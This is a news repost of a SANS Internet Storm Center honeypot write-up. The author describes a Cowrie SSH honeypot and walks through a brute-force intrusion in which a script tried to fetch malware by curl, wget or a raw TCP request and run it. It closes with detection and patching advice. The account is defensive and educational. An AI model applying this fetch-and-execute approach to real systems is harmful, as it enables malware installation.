The Storm Center is a worldwide network of honeypots that are set up and monitored by volunteers.
For anyone who doesn't know what a honeypot is, it is a server created specifically for the purpose of gathering information about unauthorized users that connect to it.
A honeypot is usually vulnerable by design and often designed to be enticing to trap unsuspecting criminals into spending more time with it.
The information gathered from the Storm Center's network of distributed sensors provides invaluable threat research data about the trending methodologies and suspicious IP addresses used by the nefarious threat actors that attack and exploit other computer systems over the wire.
There was no domain name pointing to my server, or links to the IP address being posted anywhere online for someone to find.
On the honeypot's web server, 449 IP addresses had been scanning, trying to enumerate directories, and searching for vulnerabilities.
Learning how to navigate and filter the data I wanted was a long process, but the realization that real live threat actors were attacking my tiny little server was very inspiring.
Aside from learning that automated bots are attacking my honeypot relentlessly, I learned a lot about how these attacks are designed by breaking down the actual scripts and commands that are run once they have successfully connected.
One of the attacks I dove into was from February 11th, 2024.
A cowrie server is designed to be intentionally vulnerable and allows a certain percentage of brute force attempts to successfully authenticate and gain access to the server.
The second password the attacker tried allowed them in, and they ran a wide variety of commands, most likely via automated script.
First, they ran the echo command and looked at the binary file for it, most likely to check whether the system responds to common commands as expected.
The next part of the attack tried to download malware to a temp directory and execute it.
The script began with the nohup command, which stands for 'no hangup.
The script then attempts file retrieval via curl, using conditional logic to determine if the file downloaded successfully before executing more retrieval attempts, first via wget and then by establishing a TCP connection and running an HTTP GET request.
Seeing a well-thought-out attack script coming from an automated scanner that brute forces any SSH port it sees on an IP range made me very aware of the real threat that exists out there for servers and devices left insecure on the open web.
We don't know if the attacker was trying to upload a miner, a bot, or command and control software, but I see those types of malware uploaded successfully every day.
Use of commands like curl or wget connecting to unusual IP addresses.
Research your hardware online to make sure it's still supported by the manufacturer for security updates.
Outdated software may have vulnerabilities that make it easier to fall prey to a trap that downloads or executes malware on your home computer, which could potentially lead to a threat actor pivoting to other services on your network.
This Cyber News was published on isc.sans.edu. Publication date: Wed, 26 Jun 2024 22:13:06 +0000